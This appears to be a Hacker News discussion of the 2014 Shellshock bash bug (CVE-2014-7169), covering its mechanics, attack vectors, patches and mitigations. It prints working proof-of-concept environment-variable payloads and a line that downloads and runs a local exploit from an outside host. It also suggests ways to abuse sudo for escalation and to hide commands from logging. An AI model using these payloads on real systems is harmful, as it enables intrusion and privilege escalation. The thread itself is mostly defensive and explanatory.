    5. I am an innocent sub process in 4.3.25(1)-release
1. Create a specially crafted environment variable. Ok, it's done. But, nothing has happened!

2. Create an innocent sub process. Bash in this case. During initialization...

3. ...bash spots the specially formed variable (named badvar), prints a warning,

4. ...and apparently doesn't define the function at all?

5. But other than that, the child bash runs as expected.

    1. hobbes@metal:~$ export badvar='() { :;}; echo vulnerable'
    2. hobbes@metal:~$ bash -c "echo I am an innocent sub process in '$BASH_VERSION'"
    3. vulnerable
    4. I am an innocent sub process in 4.3.22(1)-release
1. Create a specially crafted environment variable. Ok, it's done. But, nothing has happened!

2. Create an innocent sub process. Bash in this case. During initialization...

3. ...bash accidentally EXECUTES a snippet that was inside the variable named 'badvar'?!

4. But other than that, the child bash runs as expected. Wow, I should update that machine. :)


The above one didn't work for me either (it never created the file) but the example someone gave below where it's split up worked for me.

run

export X="() { (a)=>\\"

now run

bash -c 'echo date'

Now under no normal circumstances should i have a file named echo in my current directory. But i do!

In fact once that environment variable is set everytime i run bash -c 'XXXX date' i end up with a file named XXXX in my current directory. There's no way that should be happening.


> I don't think either you or the author are correct.

This is out of date, but I can't edit my comment anymore.

Carry on. :)


Switch sh to bash and it will work (create a file called echo)


It is curious to see how bash is mentioned everywhere, while the real culprit is the interaction between some web server and bash. Seriously, polutting ENV with HTTP headers? Admins should at least be able to block this.

It should be possible to mitigate this attack (and many similar) by better header values parsing (in Apache/nginx/... - maybe in some proxy?). For instance, Content-Type header can only include alphanumeric chars + slashes. Most of the other headers are similar. User-Agent is free-form, but there is no need to pass it to ENV (and it could be sanitized to only include alphanumeric chars and spaces).

Any idea, are web server maintainers working on this?


> It is curious to see how bash is mentioned everywhere, while the real culprit is the interaction between some web server and bash.

The web server side only comes into play for remote exploits. It is locally exploitable too (though the potential for useful exploits that way is lower, it is still a significant risk).


Care to elaborate? AFAIK this bug is about remote execution, not about privilege escalation. The reason is that the shell would be run with the same privileges as the user who is setting the ENV variables, and only privileged users should be able to set system-wide ENV vars.


I can think of a few ways this could be a problem if you sudo. Sudo is configured to whitelist environment variables, so just figure out which ones are on the whitelist, or find half the people who have alised sudo='sudo -E'. From man sudo on OS X:

    SECURITY NOTES
       sudo tries to be safe when executing external commands.  Variables that control how dynamic loading and binding is done can be used to subvert the program
       that sudo runs.  To combat this the LD_*, _RLD_*, SHLIB_PATH (HP-UX only), and LIBPATH (AIX only) environment variables are removed from the environment
       passed on to all commands executed.  sudo will also remove the IFS, CDPATH, ENV, BASH_ENV, KRB_CONF, KRBCONFDIR, KRBTKFILE, KRB5_CONFIG, LOCALDOMAIN,
       RES_OPTIONS, HOSTALIASES, NLSPATH, PATH_LOCALE, TERMINFO, TERMINFO_DIRS and TERMPATH variables as they too can pose a threat.  If the TERMCAP variable is
       set and is a pathname, it too is ignored.  Additionally, if the LC_* or LANGUAGE variables contain the / or % characters, they are ignored.  Environment
       variables with a value beginning with () are also removed as they could be interpreted as bash functions.  If sudo has been compiled with SecurID support,
       the VAR_ACE, USR_ACE and DLC_ACE variables are cleared as well.  The list of environment variables that sudo clears is contained in the output of sudo -V
       when run as root.
From man sudo on Ubuntu Linux: Note, however, that the actual PATH environment variable is not modified and is passed unchanged to the program that sudo executes.


Specifically, here's Debian's output of sudo sudo -V:

    Environment variables to preserve:
        XAUTHORIZATION
        XAUTHORITY
        TZ
        PS2
        PS1
        PATH
        LS_COLORS
        KRB5CCNAME
        HOSTNAME
        DISPLAY
        COLORS
Just set any of those on an account with sudo access to something that runs bash. Even if the bash command was something trivial.


That makes me think of another facet of this bug: it can bypass logging by sudo of the executed commands.

A quick look at journalctl's output shows that sudo by default, at least on the distribution I'm using, logs only the original user, the tty, the current working directory, the target user, and the command. It does not seem to log the environment variables.

So you could use an innocent-looking sudo command (like "sudo ls") to hide doing something else as root, without using obvious commands like "sudo bash" or "sudo -i".


Yes, just put a bash script called ls $HOME/bin, put that directory in $PATH, run sudo ls, and off you go...

Hopefully you would not be white-listed to run things like that (always put the full path in sudoers), so you will need some sort of "obviously bash" in the log, but we all know what we have done at moments of interaction with paper-cuts. We have probably all lessened our security to ease discomfort here and there.


I've tested this on both Ubuntu 14.04 and CentOS 6.5, and they both sanitize the path variable such that this is not possible.

I believe this is controlled via the secure_path setting in your /etc/sudoers file.


When I ran "sudo ls", the command that was logged was "/bin/ls", so putting a different ls in $PATH would not trick sudo's logging.


... didn't the above say "we clear anything that starts with ()"? Doesn't that defang this?


The problem is in bash so is potentially exploitable where-ever bash is used, while web servers could try to mitigate it with extra request filtering as an interim measure that may not be 100% effective (it comes down to "enumerating the bad" - how do you make sure you filter out everything that could be a problem without accidentally filtering out something valid, required, and safe?).

A malicious user with access to certain commands via sudo or similar could potentially use this to gain further access.


Someone else in this discussion mentioned that the badness is the exact four characters "() {" at the start of an environment variable. Filtering out all environment variables starting with these four characters should be 100% effective, and I wouldn't be surprised if Apache, sshd, sudo, dhclient, and others start filtering out values that start with precisely these four characters.

I don't think these four characters at the start of an environment variable are common; if they were, this bug would have been found out much sooner. It should be safe to filter them out.


But there you are fixing the symptom (the web server issue) not the problem (which lies in bash) so you need that fix everywhere that bash is used and not just in one place (in bash itself).

It could be a useful interim measure for code that implements it, but only if the update gets written, tested, and released before the update to bash is available - and it would weigh down the package maintainers for the distros as they'd have a sudden glut of updates coming downstream for this one issue instead of one update for one package.

People who aren't going to update bash as soon as an update is available aren't going to update everything else (where "everything else" is a set containing at least Apache, probably other web servers, and maybe many other apps) as quickly either - so fixing bash is the best course and the quickest resolution, and changing Apache and friends isn't going to have any benefit: either people update in a timely manner (so the bash fix sorts their problem) or they don't (and no end of updates will solve their problem because they don't have any of them installed).


Practically speaking, there's not a lot of difference between arbitrary code execution and privilege escalation. There are a lot of local exploits for most operating systems. So once I can execute some arbitrary commands, I can simply:

   curl http://www.exploits.org/local_exploit1 -o iwin; ./iwin
(or more sophisticated variants that ensure the code is executable).

Even if you assume an otherwise perfect OS, this is dangerous, because e.g. www-data can usually access more code and data than any given web app user could. So now I could (e.g.) start dumping the database, which I accessed because I found the password in a PHP file www-data has to be able to read.

Keep in mind that a lot of information is passed around with environment variables - it's what they are for (keeps the need for complex command line parsing - a source of bugs itself - down). So while everyone is tying the exploit to web servers, that is because it is a trivial example of a place input data can be turned into an environment variable. There are undoubtedly others - to a large extent shell scripts still run the world.


For it to be interesting, it still requires some situation where a shell is run with data provided by someone who could not have just run a shell with the same context (UID, &c) themselves. There doubtless are others - as you say, scripts still run the world - but web is by far the most obvious.


Here's one way: if you have SSH access to a server but aren't allowed to log in (a Git server, for example) you can use this exploit to execute commands on the server. Only with your own privileges admittedly but without this exploit you wouldn't be able to execute commands at all.


No, the real culprit is bash. Environment variables are a perfectly valid way to pass information around in a Unix environment. Let's not ruin the utility of environment variables because bash decided to do something idiotic with them.


I'd like to check if my home router is vulnerable to this over HTTP or DHCP or SSH. Is there any tool I can use, like the heartbleed folks had?

My router runs DD-WRT (an old version which I can't upgrade), has an administration web page and has ssh access enabled. It does not have remote web administration enabled. Any tips?


SSH in and look at your iptables. If any inbound ports are open besides state RELATED,ESTABLISHED (required for NAT), delete those rules. Reboot the router and verify that the lines do not reappear -- you may need to add a startup script to your admin page that deletes the rules on each startup.

That doesn't prevent an XSS attack on the admin page if you view a malicious web page on a browser within your home network, but it's a first step.


Isn't the router still at risk after taking these precautions seeing as many routers shell out for ping and traceroute-responses?


Thank you!


Do I correctly understand that there were `expr 7169 - 6271` 898 potential (or is that confirmed?) vulnerabilities tracked in the few hours between those two mailing list messages?

If true, I never really comprehended the volume of vulnerabilities flying by every day.


Actually, no. You can sleep more easily tonight.

Typically the CVE is assigned when the vulnerability is reported to the maintainer after it's initially discovered, before it's been made public. So really the difference represents how many other vulnerabilities there's been between the first time this was discovered (which could be months, could be weeks, I didn't check) until now.

Since 7169 was only discovered today, it immediately got assigned a new CVE while still public.

Also, the last number in the ID represents the total number of vulnerabilities tracked by CVEs in the year mentioned in th middle. So, there have been 7169 vulnerabilites in all sorts of different software this year.


Stumbled upon https://gist.github.com/anonymous/929d622f3b36b00c0be1

Just to verify; apache httpd / nginx without CGI-support is not vulnerable?


That's not how to think about it. Your web application is vulnerable if it spawns shell scripts, with any user supplied data in the environemnt.

One way for that to happen is if your CGI-application runs things via os.system() / system(). It is not the web server itself that has the problem, nor any common CGI-setup (unless you write your CGI-scripts in bash, in which case you are guaranteed to have other problems).


If I understand it correctly, nginx in that gist refers to a binary that is not nginx and is only named so that it won't look suspicious in the process listing. apache httpd / nginx without CGI should be not vulnerable. However, if you use PHP or any other language and that performs some sort of system() call, there's a vulnerability.


That's what I initially figured, but was left uneasy after seeing the Gist and trying to Google about it.


I can't imagine why people are so paranoid about the tech companies having backdoors (especially when they explicitly deny it) when the NSA or other intelligence agencies could have lots of unknown vulnerabilities to exploit.


You should be paranoid about both because they're the same thing.

One tech company's backdoor is another NSA's vulnerability to exploit (and silence with an NSL).


Link to the vulnerability report for Debian if someone needs it: https://security-tracker.debian.org/tracker/CVE-2014-7169



Tried this patch on my system and was unable to get any of the latest PoC's to trigger the bug.


Here is a simple little tool to check if your website is vulnerable http://milankragujevic.com/projects/shellshock/


Cool tool! Thanks!

If you're accepting feature requests, it would be nice if it accepted port numbers as well. Also a way to check a subsequent website without reloading the page first would be nice.


Say I have a Perl CGI script that interfaces with ffmpeg and imagemagick with backtick operators. Am I vulnerable by default? Is there anything I can do to protect myself other than take them offline?


lol @ this: http://seclists.org/oss-sec/2014/q3/681

Soon someone will be suggesting that you have to add some random string to all of your env variables to make them work, otherwise they are ignored, like with CSRF mitigation.

Actually, I jest, but that's probably a good idea, anything running on the system could view some /tmp file with the string and append it to the env variable string or something, but any remote client wouldn't be able to access that.

Hmm...


My solaris is default to tcsh but with bash installed, am I affected?


Depends. Does any remotely accessible code anywhere on your system end up shelling out to bash explicitly?


Probably not, if you're not using a service with a user who uses bash as default shell.


Ubuntu Trusty's patched version 4.3 doesn't seem to be affected by this, but Precise version still is (4.2; same one as in Debian).

Is this new exploit version dependent?


PoC floating around:

rm -f echo && env -i X='() { (a)=>\' bash -c 'echo date'; cat echo


Can someone please elaborate as to why this works? I'm unable to understand how in hell Bash turns this PoC into "date>echo".

rm -f echo && <---- Irrelevant, removes old echo files.

env -i X=' <---- Start definition of an environment variable. () { <---- Function definition which is expected by the parser according to the codebase. (a)= <---- I have no idea what this [1] is or [2] does. >\ <---- I have no Idea what this [3] is but kinda know what it does. Executing ">\echo date" in a bash term somehow yields same result as "date > echo". Is this a feature? [4] Does bash have a ">\" operator? [5]

' bash -c 'echo date'; cat echo <----- End the environment variable definition, run a new shell so that the vars get loaded and output the contents of the file "echo" if created.

I would really appreciate anyone shedding some light on [1]...[5].


Your unescaped quotes don't pair up.


They don't need to. "\" isn't an escape sequence inside single-quotes.

  echo 'abc\'
will echo 4 characters: a , b , c and \

The \' in the original command isn't trying to escape the quote, it's ending the environment variable in a "\"


not sure I follow this either. So you are setting a variable with a function def which is not supposed to be allowed, and calling bash.

Is the naughty thing that the improper function def is supposed to prevent bash to be executed?

If so, I still dont get how this is a possible RCE. nothing from the environment variable definition persists.


Reproduced from other discussion thread

Try this slight variation:

  $ export X="() { (a)=>\\"
  $ bash -c 'echo date'
  bash: X: line 1: syntax error near unexpected token `='
  bash: X: line 1: `'
  bash: error importing function definition for `X'
  $ cat echo
  Thu Sep 25 02:27:07 UTC 2014
Setting "X" in that way confuses the bash env variable parser. It barfs at the "=" and leaves the ">\" unparsed

AFAICT (without digging deep into the code) that leave in the execution buffer as ">\[NEWLINE]echo date" which gets treated the same as

  date > echo
It causes the command to be interpreted (executed) in a totally different way than it was supposed to, with the nice side effect of modifying files.

See one of my other comments for an example that uses the same flaw to read files.

I don't think anyone has found an RCE path for it yet though.


Thanks, that does entirely clear it up for me: I was missing the obvious (in hindsight):

Under normal circumstances:

  $ bash -c 'echo date'
  date
With this attack, it is not going to print out the actual date, but is actually executing something like

  date > echo:
So what happens then as you and others demonstrated:

  $ export X="() { (a)=>\\"
  $ bash -c 'echo date'
   bash: X: line 1: syntax error near unexpected token `='
   bash: X: line 1: `'
   bash: error importing function definition for `X'

  $ cat echo
   Wed Sep 24 22:38:19 EDT 2014
"echo" is now a file in my current working dir. Definitely fishy business. .. the whole flip flop of echo date to date > echo so easy to miss


I run an Ubuntu server in my closet as a general-purpose file server and such, mostly just for my own use or for sending files to friends. I have just turned it off and disabled all port forwards to it, and I will wait at least a few days and check for a more definitive fix before opening it back up to the internet. I recommend anyone in a similar situation do the same.


The only attack vectors I've seen so far are:

* webservers that are configured to run things via the ancient CGI interface. There are lots of these on the internet (so that's bad) but most OSes aren't going to be vulnerable out of the box or anything. Also, the biggest risk is if you're on a server where /bin/sh is bash, which is not the case for Ubuntu.

* people using sshd and have users that are allowed to ssh but not run a shell -- for instance by having "command=" settings in a .ssh/authorized_keys file. Most people won't have this. It's a pattern most associated with services like github which allows you to use git-over-ssh but not run arbitrary programs on their servers. Another example would be if you've set up a special key for a backup system to connect over ssh and run rsync. Most servers aren't going to have these things. If you're just using sshd for normal user logins there is no impact: you can "exploit" the bug and run arbitrary commands, but only if you have the same credentials you could have used to log in and run them yourself anyway.

* DHCP clients could be affected, but only if the server is already compromised (or spoofed) which probably isn't a huge concern for your home network.

So you're probably overreacting here. Certainly stay up-to-date on the patches as they come out for safety, though.


Why?

Why don't you uninstall bash all-together? Most programs should be using '/bin/sh' and not bash.(IIRC Linux might have symlink between the two, which is awful) You could install zsh.

You could add further security layers, harden your network-level access, monitor your logs and so forth. Security is a set of policies. If you think that there are users who have unauthorized access to your system or you run bash-enabled cgi scripts, well then disable them (you shouldn't be using those in first place anyway), lock-out unauthorized users, change your passwords, etc.

The panic is for admins who handle systems with multiple users (universities, etc.) and offer (even restricted) shell access. For these guys might be hard to sleep at night, but for someone running a fileserver, shouldn't really make any diff.


>Most programs should be using '/bin/sh' and not bash.

Why? There are some non-trivial things that you can do in bash but not sh (or dash)[1]. Remaining POSIX compatible by way of never adding additional features seems like a great way to never make any forward progress.

[1]: http://mywiki.wooledge.org/Bashism


From FreeBSD manual page for 'sh':

     DESCRIPTION
     The sh utility is the standard command interpreter for the system.  The current version of sh is close to the IEEE Std 1003.1 (“POSIX.1”) specification for the shell.  It only supports features designated by POSIX,plus a few Berkeley extensions.  [...]
Again from FreeBSD manual for 'bash':

      DESCRIPTION
      Bash  is  an  sh-compatible  command language interpreter that executes commands read from the standard input or from a file.  Bash also incorporates useful features from the Korn and C shells (ksh and csh). Bash  is  intended  to  be a conformant implementation of the Shell and Utilities portion  of  the  IEEE  POSIX  specification  (IEEE  Standard 1003.1).  Bash can be configured to be POSIX-conformant by default.

These two shells are different and the reason that FreeBSD keeps '/bin/sh' is because it was designed to be secure and reliable instead of full-featured. Makes sense as a choice, it is aligned with the general UNIX philosophy: do one thing, do it good, keep it as simple as possible.

Given the fact that the bug was found in bash, I guess it's just (another) win for this harsh philosophy that so many geeks seem to strongly embrace.


I don't have the time right now to figure out what the default shell is and whether Ubuntu supports switching it, and whether I have any custom scrips or some such that assume /bin/sh is bash. So the easiest thing to do is just disconnect it for now.


No need to go to that length. Ubuntu uses dash as its standard /bin/sh. If you're super paranoid, chmod /bin/bash to 000 and fix any broken scripts that call that shebang; most likely, they don't use any bashisms and can use the stock bourne shell.


I just tested on fully patched Ubuntu 14.04 - still vulnerable per this method.


[deleted]


If it's truely unused, you should be using /bin/false instead of /bin/sh. Note that /bin/sh is not always dash in many cases, so just because you are using /bin/sh over /bin/bash doesn't mean you're not vulnerable.


Trivia: /bin/false (not surprisingly), exits with a failure. I read some time ago of some *nix (I don't recall which) recognizing that the attempt to start a shell (/bin/false) "failed" and helpfully starting /bin/sh for you so you could recover your system. I still use /bin/true as my "not a shell" shell for this reason.


/bin/nologin exists for this reason - if nothing's supposed to be logging in as that user, surely you want a log of when someone tries!


Hi everyone,

We just published this tool to test for Shellsheck. https://suite.websecurify.com/market/shellshock

Do a scan over before it is too late.


Is this a problem even if /bin/sh is not bash? I'm pretty confused at why one would ever want /bin/sh to be bash (and not, say, dash). If you want bash, ask for it.


My Zsh seems vulnerable. Anyone else care to replicate this?

-- ➜ ~ zsh --version

zsh 5.0.2 (x86_64-apple-darwin13.0)

➜ ~ echo $SHELL

/bin/zsh

➜ ~ env x='() { do_something;}; echo vulnerable' bash -c "echo this is a test"

vulnerable

this is a test ---


You are using bash there...


if you do it correctly by using zsh instead of bash, you would that it is not vulnerable

  env x='() { do_something;}; echo vulnerable' zsh -c "echo this is a test"
  this is a test



An accepted patch has been released in the form of 4.3-9.1 [1]. It's available on debian everywhere except oldstable.

[1] http://osdir.com/ml/general/2014-09/msg47743.html


That's the previous patch, and it didn't fix all the cases. Far as I know, the new one is still unpatched, and people are carefully going through the thicket of string parsing to try to fix it for good.


Doesn't appear to have made it into jessie.


I'm very annoyed by the founder of this exploit, if you are going to release something as serious as this. At least work on a solution first. Bash source code is open and out there, isn't this suppose to be the "benefits" of open source? Gee.


Look at the original announcement from earlier today. This was a known issue and responsible disclosure was exercised -- the issue didn't become public until 5 minutes after the embargo was lifted (i.e., 5 minutes after it was agreed the issue and patch would go public). Since it's so easy to exploit this bug, it'd be impossible to release a patch without people taking notice and immediately beginning to exploit vulnerable systems.

Someone just did a really bad job vetting the patch for thoroughness.


Chet (bash maintainer) has indicated that this issue is different to the original CVE.

The problem is the first issue altered people to the fact the the function var parsing was a interesting previously-unpublicized attack vector, and they started looking for more funkiness there.

It would have been nice if the response to the first issue had been to do a thorough and complete testing of the parsing code, but it's not really surprising that it wasn't.


I don't think that's fair. What if he doesn't know how?

He could propose a patch sure, but exploiting a code base may not require in-depth knowledge of it, while making a good patch to it is much more likely to. (I suppose in an ideal situation the fix would be localized to a spot where one would only have to understand a screenful or two of code, but in my experience this is not usually the case.)


I wouldn't be surprised if he found it by accident. This exploit seems a lot easier to stumble upon in "normal" usage than something like Heartbleed for instance.


That's what I'm guessing too. It's not easy to come up with a patch that will definitively prevent an exploit. It's also very possible the exploit finder didn't understand the intricate details of why the exploit worked; he just knows it works.




Join us for AI Startup School this June 16-17 in San Francisco!

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: